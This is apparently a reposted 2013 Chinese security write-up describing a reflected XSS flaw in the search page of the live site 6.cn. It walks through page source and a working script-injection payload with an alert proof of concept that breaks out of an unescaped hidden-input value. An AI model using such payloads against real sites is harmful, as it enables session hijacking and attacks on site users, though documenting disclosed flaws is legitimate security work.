好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

6间房(6.cn)XSS反射型漏洞 - 网站安全 - 自学php

Author:H3art Data:Jan 16,2013 漏洞 页面:http://v.6.cn/search.php?key&type= 现在type后面随便填写一个,然后再查看 源码 。  http://v.6.cn/search.php?key&type=xss

 <a rel="nofollow" id="itoPlay" target="_blank" class="toPlay" href="http://v.6.cn/logins.php">开始直播</a> 

    <div class="search">

      <form name="search" method="get" action="http://v.6.cn/search.php" onsubmit="return searchBox.submit(this)">

<input type="hidden" name="type" autocomplete="off" value="xss" id="input_type" />

        <div class="searchBox"> <span class="soInput">

          <input type="text" name="key" value=""/>

          </span>

          <div id="so_option" class="soOption" onclick="searchBox.setOption()"><a class="soType"><span id="so_type">用户</span><em> </em></a>

<div class="soTypeList"> 从 <input type="hidden" name="type" autocomplete="off" value="xss" id="input_type" />分析。而这个xss就是我们刚才输入的值。可见value是控制用户输入的。下面我们在里面输入xss[>把前面的input闭合一下。 <a rel="nofollow" id="itoPlay" target="_blank" class="toPlay" href="http://v.6.cn/logins.php">开始直播</a> 

    <div class="search">

      <form name="search" method="get" action="http://v.6.cn/search.php" onsubmit="return searchBox.submit(this)">

<input type="hidden" name="type" autocomplete="off" value="xss">" id="input_type" />

        <div class="searchBox"> <span class="soInput">

          <input type="text" name="key" value=""/>

          </span>

          <div id="so_option" class="soOption" onclick="searchBox.setOption()"><a class="soType"><span id="so_type">用户</span><em> </em></a>

<div class="soTypeList">

 

大家可以看到 当你闭合之后 后面的  " id="input_type" />就在页面显示出来了。 我们输入xss]><script>alert("xss by H3art")</script> 再分析一下源代码

 <a rel="nofollow" id="itoPlay" target="_blank" class="toPlay" href="http://v.6.cn/logins.php">开始直播</a> 

    <div class="search">

      <form name="search" method="get" action="http://v.6.cn/search.php" onsubmit="return searchBox.submit(this)">

<input type="hidden" name="type" autocomplete="off" value="xss"><script>alert("xss by H3art")</script>" id="input_type" />

        <div class="searchBox"> <span class="soInput">

          <input type="text" name="key" value=""/>

          </span>

          <div id="so_option" class="soOption" onclick="searchBox.setOption()"><a class="soType"><span id="so_type">用户</span><em> </em></a>

<div class="soTypeList"> 接着输入 xss]><script>alert("xss by H3art")</script><input type="xss" name="xss

 <a rel="nofollow" id="itoPlay" target="_blank" class="toPlay" href="http://v.6.cn/logins.php">开始直播</a> 

    <div class="search">

      <form name="search" method="get" action="http://v.6.cn/search.php" onsubmit="return searchBox.submit(this)">

<input type="hidden" name="type" autocomplete="off" value="xss"><script>alert("xss by H3art")</script><input type="xss" name="xss" id="input_type" />

        <div class="searchBox"> <span class="soInput">

这个漏洞可以说跟 前段时间 土豆网爆出的xss 一样。。

查看更多关于6间房(6.cn)XSS反射型漏洞 - 网站安全 - 自学php的详细内容...

  阅读:31次